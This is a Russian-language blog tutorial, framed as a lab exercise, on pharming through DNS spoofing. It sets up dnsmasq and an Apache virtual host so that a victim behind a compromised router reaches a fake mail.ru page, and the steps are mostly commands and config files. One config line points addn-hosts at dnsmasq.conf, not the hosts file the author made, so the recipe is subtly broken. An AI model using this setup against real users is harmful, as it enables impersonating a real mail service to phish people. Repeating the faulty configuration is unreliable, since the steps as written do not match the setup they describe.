понедельник, 6 мая 2019 г.

Атака через подмену DNS (Фарминг)

Допустим, что кто то получил доступ к нашему роутеру. В таком случае, если этот кто-то злобный "хацкер", то он может осуществить такую атаку, как фишинг через подмену DNS. Далее я покажу как в лабораторных условиях, можно осуществить подобную атаку. 


Итак приступим. На машине атакующего будем использовать HTTP сервер apache и DNS сервис dnsmasq, все это добро есть в Kali. Далее можно создать несколько виртуальных хостов, но для примера создадим один хост. Например атакующий хочет перехватить доменное имя сайта mail.ru и перенаправить жертву на свой сервер, то для этого нам понадобится создать следующую директорию для виртуального хоста:
mkdir /var/www/mail.ru 
В этой папке создаем фейковую страницу (самую простую для примера):
echo '<html><h1>mail.ru</h1></html>' > index.html 
Создаем виртуальный хост для апача. Для этого создаем при помощи редактора vi такой конфиг:
vi /etc/apache2/sites-available/mail.ru.conf 
нажимаем клавишу i и прописываем в нем следующее:
<VirtualHost *:80> 
ServerName mail.ru 
ServerAlias www.mail.ru 
DocumentRoot /var/www/mail.ru 
ErrorLog ${APACHE_LOG_DIR}/error.log 
CustomLog ${APACHE_LOG_DIR}/access.log combined 
</VirtualHost> 
где
    ServerName - основное имя домена
    ServerAlias - дополнительное имя, по которому будет доступен сайт
    DocumentRoot - папка с документами для этого домена
    ErrorLog - логи ошибок
    CustomLog - логи доступа
Сохраняемся и выходим из vi (нажимаем клавишу ESC и вводим команду :wq)

Далее нам нужно сопоставить наше имя нового хоста с IP адресом нашего сервера где запущен apache. Это можно сделать добавив запись в файл: /etc/hosts. А если мы не хотим трогать файл /etc/hosts, то создадим отдельный файл
vi /etc/dnsmasq.hosts 
и пропишем адрес и доменное имя в нем
192.168.0.99 mail.ru 
Настроим dnsmasq. Для этого создадим конфиг файл для dnsmasq
vi /etc/dnsmasq.conf 
 и пропишем такие настройки:
#Если не хотим использовать /etc/hosts 
no-hosts 
#Наш файл с хостами 
addn-hosts= "/etc/dnsmasq.conf" 
Теперь надо запустить апач, делается это командой:
systemctl start apache2
Если апач запущен, то нужно сначала активировать созданный хост командой:
a2ensite mail.ru 
А затем надо перезагрузить сам апач:
systemctl reload apache2 
Далее запускаем сконфигурированный DNS сервис и передаем ключи для просмотра логов в терминале:
dnsmasq --no-daemon --log-queries 
Теперь все готово для фишинга. Заходим на наш роутер и прописываем в настройках DNS - IP адрес машины где крутится dnsmasq. Теперь, с компьютера жертвы, который подключен к нашему роутеру пробуем зайти через браузер на сайт mail.ru, но попадаем на фейковую страницу.

Комментариев нет:

Отправить комментарий